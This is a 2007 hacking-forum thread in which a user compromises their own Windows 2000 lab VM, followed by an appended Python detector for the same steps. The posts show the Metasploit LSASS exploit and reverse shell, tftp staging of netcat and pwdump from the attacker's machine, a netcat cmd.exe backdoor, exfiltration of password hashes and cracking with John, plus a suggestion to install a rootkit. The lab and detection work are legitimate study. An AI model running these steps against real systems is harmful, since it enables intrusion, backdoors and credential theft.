Hack In The Box Forums

'Keeping Knowledge Free' != 'Promoting Random Carnage'
 Post subject: Penetration Tester's Lab - Hack your own machine (win2k sp4)
PostPosted: Wed Jun 27, 2007 8:11 pm 
I'M NOT IN THE ▉

Joined: Thu Oct 16, 2003 4:37 pm
Posts: 63
I just installed Windows 2000 Pro SP4 into VMware, and now I want to do some penetration testing on this machine... hopefully you can help me find all the vulnerabilities in this machine...

Quote:
bt ~ # nmap -sS -O 192.168.0.10

Starting Nmap 4.20 ( http://insecure.org ) at 2007-06-27 19:08 GMT
Interesting ports on 192.168.0.10:
Not shown: 1692 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3372/tcp open msdtc
MAC Address: 00:0C:29:B5:45:09 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000, SP0, SP1, or SP2
Network Distance: 1 hop



Then I ran Metasploit to find out what kind of vulnerabilities exist in the system,
and I managed to penetrate using the ms04_011_lsass exploit...

Quote:
msf exploit(ms04_011_lsass) > exploit
[*] Started reverse handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.0.11:4444 -> 192.168.0.10:1093)
[*] The DCERPC service did not reply to our request

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>hostname
hostname
grindcore-test


I also ran LANguard... but there is not much I can get from it...

Mmm... besides that, what else can I do to penetrate this machine? If you want to get the same result, you can set up your own Windows 2000 Pro SP4 with the default configuration... I just set a password on the administrator account.


PostPosted: Wed Jun 27, 2007 10:06 pm 
Forum Administrator

Joined: Sun May 21, 2006 3:49 pm
Posts: 2511
From there you could install a rootkit to hide yourself. Try having someone else set the password, so you have to crack it, or exploit yourself into admin or higher.

Nice job though.

_________________
“Progress isn't made by early risers. It's made by lazy men trying to find easier ways to do something.” -- Robert A. Heinlein


PostPosted: Thu Jun 28, 2007 1:27 am 
Acolyte

Joined: Fri May 18, 2007 9:17 pm
Posts: 418
Good stuff, I've been meaning to set up VMWare but haven't found the time.

freedom_is_chaos wrote:
exploit yourself into admin or higher.


Godmode user?


PostPosted: Thu Jun 28, 2007 1:35 am 
Joint Forum Administrator

Joined: Thu Oct 21, 2004 5:36 am
Posts: 4281
Location: 127.0.0.1
drewch wrote:
[...]
freedom_is_chaos wrote:
exploit yourself into admin or higher.


Godmode user?


The SYSTEM account is higher than the administrator.

_________________
"People don't need backup. They just need restore." - Linux kernel mailing list
"To understand recursion, we first must understand recursion." - Unknown

The Rules. We build smiles.


PostPosted: Thu Jun 28, 2007 1:54 am 
Acolyte

Joined: Fri May 18, 2007 9:17 pm
Posts: 418
icebear42 wrote:
drewch wrote:
[...]
freedom_is_chaos wrote:
exploit yourself into admin or higher.


Godmode user?


The SYSTEM-account is higher than the administrator.


I suspected there was something I didn't know about. Thank you very much.


PostPosted: Thu Jun 28, 2007 10:20 am 
I'M NOT IN THE ▉

Joined: Thu Oct 16, 2003 4:37 pm
Posts: 63
Thanks to all for your response and feedback...
FYI, when I use the lsass exploit, it sends the reverse shell back to me with administrator privilege...
That means now I can do whatever I want to this machine...

And for learning purposes, I don't intend to hide myself using any kind of rootkit or trojan, because I just want to find ways to get into the system...
And what kind of exploits can be used against Windows 2000 Professional SP4 besides the lsass exploit?

After this, I plan to install IIS and try to deface the website...


PostPosted: Thu Jun 28, 2007 11:14 am 
Acolyte

Joined: Fri May 18, 2007 9:17 pm
Posts: 418
Check out SecurityFocus.com; it will give you a list of all exploits for any vendor/application/version combination. So you can find more 2000 exploits, perhaps even ones that aren't in Metasploit, so you can also exploit by compiling it yourself, and maybe change the code for different payloads etc. Then you can install different vulnerable versions of IIS and go from there.
Have fun.


PostPosted: Thu Jun 28, 2007 12:38 pm 
I'M NOT IN THE ▉

Joined: Thu Oct 16, 2003 4:37 pm
Posts: 63
I know about that, SecurityFocus, Bugtraq... that's why I'm asking your advice here, especially from those who have already done this kind of testing before...
The machine, Windows 2000 SP4, was configured with the default configuration...
I did nothing except change the administrator password.


Last edited by grindcore on Fri Jun 29, 2007 10:02 am, edited 1 time in total.

PostPosted: Thu Jun 28, 2007 2:36 pm 
Reconnaissance Officer

Joined: Sun Mar 25, 2007 1:43 pm
Posts: 1035
Location: Outside looking through your window..
Quote:
i didn't do nothing unless


:lol:

_________________
"To perceive is to suffer."
Aristotle


PostPosted: Sun Jul 08, 2007 3:19 pm 
I'M NOT IN THE ▉

Joined: Thu Oct 16, 2003 4:37 pm
Posts: 63
Continuing from the last session, this time I'll create a backdoor using netcat and do the password assessment using John the Ripper...

After getting the shell, I'll download a few tools from my PC...
Code:
tftp -i 192.168.0.11 get pwdump4.exe
tftp -i 192.168.0.11 get pwdump4.dll
tftp -i 192.168.0.11 get nc.exe


Then, run netcat for backdoor purposes on port 2111

Code:
nc -L -p 2111 -e cmd.exe


From the win2k machine, run this command to get the password hashes

Code:
pwdump4 /l /o:pwdump4.txt


Send those hashes to my machine

Code:
tftp 192.168.0.11 put pwdump4.txt


Last thing to do for today: the password assessment

Code:
john -w:wordlist.txt pwdump4.txt


That's it... and game over...

P/S - I'll appreciate any comment or suggestion to improve my skills... For the next lab, I'll install IIS for a Unicode exploit lab...


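A defender's counterpart to the steps in the post above, added here as an example that is not from the thread: a small Python detector run over constructed process-creation log lines (the pipe-separated log format is assumed, not a real product format; host name, IPs and commands are taken from the posts), flagging the tftp tool staging, the netcat -e listener, the pwdump run and the tftp exfil that the walk-through performs.

```python
import re
from typing import Dict, List

# Constructed sample of process-creation events on the lab host, modelled
# on the commands posted in the thread. Assumed format (not a real
# product's): timestamp|host|user|command line
SAMPLE_EVENTS = """\
2007-07-08 15:10:02|grindcore-test|NT AUTHORITY\\SYSTEM|tftp -i 192.168.0.11 get pwdump4.exe
2007-07-08 15:10:05|grindcore-test|NT AUTHORITY\\SYSTEM|tftp -i 192.168.0.11 get nc.exe
2007-07-08 15:11:30|grindcore-test|NT AUTHORITY\\SYSTEM|nc -L -p 2111 -e cmd.exe
2007-07-08 15:12:10|grindcore-test|NT AUTHORITY\\SYSTEM|pwdump4 /l /o:pwdump4.txt
2007-07-08 15:12:40|grindcore-test|NT AUTHORITY\\SYSTEM|tftp 192.168.0.11 put pwdump4.txt
2007-07-08 15:13:00|grindcore-test|GRINDCORE-TEST\\user|notepad.exe report.txt
"""

# Each rule: (name, regex over the command line, why it matters).
RULES = [
    ("tftp_tool_staging",
     re.compile(r"\btftp(\.exe)?\b.*\bget\b\s+\S+", re.I),
     "binary pulled onto the host over tftp (no auth, cleartext)"),
    ("tftp_exfil",
     re.compile(r"\btftp(\.exe)?\b.*\bput\b\s+\S+", re.I),
     "file pushed off the host over tftp"),
    ("netcat_bind_shell",
     # nc listening (-L/-l/-lp) while binding cmd.exe to the socket with -e
     re.compile(r"\bnc(\.exe)?\b(?=.*\s-[lL])(?=.*\s-e\s+\S*cmd(\.exe)?)", re.I),
     "netcat listener handing out cmd.exe: backdoor shell"),
    ("credential_dump",
     # only fires when pwdump is the image being run, not a file argument
     re.compile(r"^\s*(?:\S*[\\/])?pwdump\d*(?:\.exe)?\b", re.I),
     "SAM hash dump tool executed"),
]


def parse_event(line: str) -> Dict[str, str]:
    ts, host, user, cmd = line.split("|", 3)
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}


def detect(events_text: str) -> List[Dict[str, str]]:
    """Return one finding per (event, matching rule), in log order."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for name, rx, why in RULES:
            if rx.search(ev["cmd"]):
                findings.append({"rule": name, "host": ev["host"],
                                 "user": ev["user"], "cmd": ev["cmd"], "why": why})
    return findings


def run_sample() -> List[Dict[str, str]]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['cmd']}  ({f['why']})")
```

Each step of the walk-through leaves a distinct command-line artefact, so a lab like this one is also a good place to confirm that process-creation auditing on the target actually records them.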